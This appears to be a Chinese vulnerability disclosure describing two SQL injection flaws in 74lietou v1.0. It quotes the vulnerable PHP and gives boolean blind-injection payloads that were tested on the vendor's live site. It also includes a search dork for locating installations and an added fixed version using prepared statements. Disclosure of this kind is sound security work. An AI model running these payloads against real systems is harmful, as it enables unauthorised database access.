### Brief description:
Official site: http://74lietou.74cms.com/
### Detailed description:
The first injection point is in /plus/ajax_user.php:
```
elseif($act == 'only_check_language'){
    $lang = trim($_POST['param']) ? trim($_POST['param']) : exit("选择语言不能为空!");
    // $lang is concatenated into the query with no quoting and no integer cast
    $sql = "select * from ".table('resume_language')." where language = ".$lang." and uid = ".$_SESSION['uid'];
    $userinfo = $db->getone($sql);
    if ($userinfo) {
        exit("已经选择此语言!");
    } else {
        exit("y");
    }
```
The POST value arrives without being wrapped in single quotes, so it is concatenated straight into the SQL, which makes injection possible.
http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language
POST body:
```
param=12' ||%20left(version(),1)%20between%200%20and%205--%20a
```
This tests whether the first digit of the database version is between 0 and 5; the response is `已经选择此语言!` (language already selected).
```
param=12' ||%20left(version(),1)%20between%200%20and%204--%20a
```
This tests whether the first digit is between 0 and 4; the response is `y`.
![360截图-1870531.jpg](https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg)
![360截图-1882703.jpg](https://images.seebug.org/upload/201507/2111550910ffcaa36b9b7cc2e1d1ee0e8b10f3c5.jpg)
The second injection point is in /user/company/company_recruitment.php:
```
elseif($act == "export_resume") {
    // y_id is taken from $_REQUEST (GET or POST) and may be a scalar or an array
    $yid = !empty($_REQUEST['y_id']) ? $_REQUEST['y_id'] : showmsg("你没有选择简历!",1);
    if (!export_resume($yid)) {
        showmsg("导出失败!",0);
    }
```
Following export_resume():
```
function export_resume($yid){
    global $db;
    if (is_array($yid) && !empty($yid)) {
        $yid_str = implode(",", $yid);   // array elements are joined as-is
    } else {
        $yid_str = $yid;                 // scalar is used as-is
    }
    $oederbysql = " order BY refreshtime desc ";
    // $yid_str lands directly inside "id in (...)" without validation
    $wheresql = empty($wheresql) ? " id in ({$yid_str}) " : " and id in ({$yid_str}) ";
    if (!empty($wheresql)) {
        $wheresql = " WHERE ".ltrim(ltrim($wheresql),'AND');
    }
    $data = $db->getall("select * from ".table('resume').$wheresql);
```
$_REQUEST['y_id'] is not filtered, which leads to injection. This one requires a logged-in account that has passed review, so it was not demonstrated on the official site but tested locally.
![360截图-2515750.jpg](https://images.seebug.org/upload/201507/211204448fb48e6cbfd8b7fc4d412635555ad2c1.jpg)
![360截图-2536218.jpg](https://images.seebug.org/upload/201507/21120452f55c43ace85162414c0d3bd8e0e38879.jpg)
Likewise, using the POST value:
```
' ||%20left(version(),1)%20between%200%20and%205--%20a
```
This tests whether the first digit of the database version is between 0 and 5.
```
' ||%20left(version(),1)%20between%200%20and%204--%20a
```
This tests whether the first digit is between 0 and 4.
Injection is possible in the same way; it is not demonstrated further here.
Cases:
Search keyword: Powered by 74lietou v1.0
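As an added example covering both injection points above (not 74lietou's own code), the same two queries rewritten so that the language id and the y_id list are validated as positive integers and bound with PDO prepared statements instead of being concatenated into the SQL. The table() helper, its "qs_" prefix and the in-memory SQLite schema used for the demo are assumptions.

```php
<?php
// Added example, not 74lietou's code: hardened forms of the two queries in this
// report. table() and the "qs_" prefix are assumed stand-ins for the original's
// prefix helper; the SQLite in-memory database exists only so the demo runs.

function table(string $name): string { return 'qs_' . $name; }  // assumed prefix

// /plus/ajax_user.php act=only_check_language: language is a numeric id, so
// validate it as a positive integer and bind it instead of concatenating $lang.
function language_already_chosen(PDO $pdo, int $uid, string $param): bool {
    $lang = filter_var(trim($param), FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($lang === false) {
        throw new InvalidArgumentException('language id must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT 1 FROM ' . table('resume_language')
                        . ' WHERE language = ? AND uid = ? LIMIT 1');
    $stmt->execute([$lang, $uid]);
    return (bool) $stmt->fetchColumn();
}

// export_resume(): y_id may be a scalar or an array and the original implodes it
// straight into "id in (...)". Normalise to positive ints and emit one
// placeholder per id, so request data never becomes part of the SQL text.
function export_resume_safe(PDO $pdo, $yid): array {
    $ids = [];
    foreach ((array) $yid as $v) {
        $n = filter_var($v, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($n !== false) { $ids[] = $n; }
    }
    if ($ids === []) { return []; }  // caller maps this to "你没有选择简历!"
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare('SELECT * FROM ' . table('resume')
                        . " WHERE id IN ($marks) ORDER BY refreshtime DESC");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo on a constructed schema: user 7 has language 12; two resumes exist.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE qs_resume_language (uid INTEGER, language INTEGER)');
$pdo->exec('CREATE TABLE qs_resume (id INTEGER, refreshtime INTEGER)');
$pdo->exec('INSERT INTO qs_resume_language VALUES (7, 12)');
$pdo->exec('INSERT INTO qs_resume VALUES (1, 100), (2, 200)');
var_dump(language_already_chosen($pdo, 7, '12'));  // a plain numeric id still works
try {  // the report's payload is rejected before any SQL is built
    language_already_chosen($pdo, 7, "12' || left(version(),1) between 0 and 5-- a");
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
var_dump(count(export_resume_safe($pdo, ['2', '1', '1) or 1=1 -- '])));  // non-integer entry dropped
```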
### Proof of vulnerability:
Report title: 74lietou v1.0, two new injection points bypassing the global anti-injection filter (demonstrated on the official site)